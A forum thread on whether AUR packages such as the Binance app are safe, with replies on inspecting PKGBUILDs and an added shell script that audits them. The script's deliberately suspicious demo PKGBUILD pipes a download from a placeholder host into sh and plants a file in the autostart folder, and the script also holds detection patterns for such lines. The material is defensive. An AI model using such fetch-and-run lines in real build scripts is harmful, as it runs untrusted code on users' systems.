Are packages in the AUR safe in the sense that they can't steal your password or something?

hello.

I’m trying to install the Binance trading app on my system. The official downloads only have the deb and rpm formats, but it’s in the AUR. Is the AUR version safe in the sense that it won’t steal passwords or something? You know, since my money is in there lol.

“Packages” in the AUR are not pre-compiled packages, per se.

What you get are “instructions” for an AUR helper (such as pamac or yay) to download, build, and install a package not in the official repositories.

You can examine a package for security by going to the package’s page on aur.archlinux.org (“AUR (en) - binance”) and looking at the PKGBUILD.

In the case of binance, the PKGBUILD downloads the deb version of the software and repackages it into an Arch/Manjaro package.


Welcome to the forum! 😉

First of all, there aren’t actually any packages on the AUR itself. It’s a repository with build scripts, and those scripts ─ specifically, the PKGBUILD file ─ pull in the actual source code packages (or binary packages if applicable) from wherever those are stored. So when it comes to the AUR, you can always look at the PKGBUILD file and check what it pulls in, and from where it pulls in those things.

Now, secondly, it has in the past happened that people who had upload access to the AUR were uploading corrupted packages ─ i.e. the PKGBUILD would pull in malware. Sometimes that was by accident ─ because the uploader hadn’t actually verified what they were linking to ─ and other times it was malicious, e.g. through a hacked AUR account. But in such cases, the community quickly discovers such malpractice and will report it, and then the packages in question will be removed and the account of the uploader will be blocked.

So the general rule when it comes to the AUR is “Practise discernment, check the PKGBUILD, and be responsible.” But in practice, and for the most part, one could say that the AUR is fairly trustworthy.


tl;dr
If the PKGBUILD pulls either the (actual) source, RPM or DEB package, and doesn’t do anything out of the ordinary with it, it’s as safe as the original. Is the original safe?

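A way to put the two replies above (“check what the PKGBUILD pulls in and from where” and “as safe as the original if it doesn’t do anything out of the ordinary”) into practice, as an added example that is not part of this thread and is not the real AUR binance PKGBUILD: a small POSIX shell script that reads a PKGBUILD as text, lists what it would download and from where, and flags the things worth stopping at: non-TLS sources, checksums set to SKIP, extra curl/wget downloads or pipe-to-shell inside prepare()/build()/package(), and writes outside $srcdir/$pkgdir. The two PKGBUILD files it checks are constructed for the demo, and the example.com / example.net hosts are placeholders.

```shell
#!/bin/sh
# Added example, not from the thread and not the real AUR binance PKGBUILD:
# an offline check of what a PKGBUILD pulls in and what it does with it.
# Both PKGBUILD files below are constructed for the demo.
demo_dir=${TMPDIR:-/tmp}/pkgbuild-audit-demo
mkdir -p "$demo_dir"

# A "repackage the upstream .deb" recipe that does nothing out of the ordinary:
# one https source, pinned by checksum, and package() only touches $pkgdir.
cat > "$demo_dir/PKGBUILD.clean" <<'EOF'
pkgname=example-bin
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.com/releases/example-${pkgver}.deb")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
package() {
  # makepkg has already unpacked the .deb into $srcdir
  bsdtar -xf data.tar.xz -C "$pkgdir"
}
EOF

# The same recipe with the things a reader should stop at: a non-TLS mirror
# instead of the vendor site, checksums set to SKIP, an extra download piped
# into a shell during prepare(), and a write into the user's home directory.
cat > "$demo_dir/PKGBUILD.suspicious" <<'EOF'
pkgname=example-bin
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("http://mirror.example.net/example-${pkgver}.deb"
        "post-install.sh")
sha256sums=('SKIP'
            'SKIP')
prepare() {
  curl -fsSL https://updates.example.net/setup.sh | sh
}
package() {
  bsdtar -xf data.tar.xz -C "$pkgdir"
  cp post-install.sh "$HOME/.config/autostart/"
}
EOF

# Print the elements of a bash array assignment (source=(...), sha256sums=(...))
# by text. Never `source` a PKGBUILD to read it: it is bash, and sourcing it runs
# any top-level code it contains. Handles multi-line arrays and "localname::URL".
pkgbuild_array() {
    awk -v name="$1" '
        $0 ~ ("^" name "=\\(") { inarr = 1; sub("^" name "=\\(", "") }
        inarr {
            if ($0 ~ /\)/) { sub(/\).*/, ""); inarr = 0 }
            n = split($0, parts, /[ \t]+/)
            for (i = 1; i <= n; i++) if (parts[i] != "") print parts[i]
        }' "$2" | tr -d "\"'" | sed 's/^[^:]*:://'
}

# Report what a PKGBUILD fetches and flag the usual red flags, one "WARN:" line each.
audit_pkgbuild() {
    file=$1
    echo "== $file: declared sources =="
    pkgbuild_array source "$file" | while read -r src; do
        echo "  $src"
        case "$src" in
            http://*|ftp://*) echo "WARN: source fetched without TLS: $src" ;;
            *://*)            ;;   # https, git+https, ...: still check the host is the real upstream
            *)                echo "  (local file shipped in the AUR repo: read it too)" ;;
        esac
    done
    echo "== checksums =="
    for arr in md5sums sha1sums sha256sums sha512sums b2sums; do
        pkgbuild_array "$arr" "$file" | while read -r sum; do
            case "$sum" in
                SKIP) echo "WARN: $arr has SKIP: the download is not pinned to anything" ;;
                *)    echo "  $arr: $sum" ;;
            esac
        done
    done
    echo "== actions inside prepare()/build()/package() =="
    # makepkg downloads everything in source= itself; any curl/wget in a build
    # function is an extra, unpinned download, and piping it into sh is worse.
    grep -nE '^[^#]*(^|[^A-Za-z_])(curl|wget) ' "$file" | sed 's/^/WARN: ad-hoc download at line /'
    grep -nE '^[^#]*(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$file" | sed 's/^/WARN: download piped into a shell at line /'
    grep -nE '^[^#]*(^|[^A-Za-z_])sudo ' "$file" | sed 's/^/WARN: privilege escalation at line /'
    # Build functions should only write under $srcdir and $pkgdir.
    grep -nE '^[^#]*(/etc/|\$HOME|~/)' "$file" | grep -vE 'pkgdir|srcdir' | sed 's/^/WARN: writes outside the build directories at line /'
}

# Number of WARN lines for a PKGBUILD (0 means "as safe as the original download").
warn_count() {
    audit_pkgbuild "$1" | grep -c '^WARN:' || true
}

for f in "$demo_dir/PKGBUILD.clean" "$demo_dir/PKGBUILD.suspicious"; do
    audit_pkgbuild "$f"
    echo "-> $(warn_count "$f") warning(s)"
done
```

Save it as a file and run it with `sh`, or point `audit_pkgbuild` at a PKGBUILD you cloned from the AUR. The parse is deliberately textual: a PKGBUILD is a bash script, so `source PKGBUILD` to read its variables would execute exactly the code you are trying to inspect. A report with zero warnings does not make the package safe; it only tells you the package is as safe as the file it downloads, which is the tl;dr above, and you still have to confirm that the host in `source=` is the vendor’s own site and not a lookalike mirror.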

How to link please because I am a newb

When downloading or installing AUR packages, you will be asked whether you want to inspect the PKGBUILD. It’s a human-readable script.
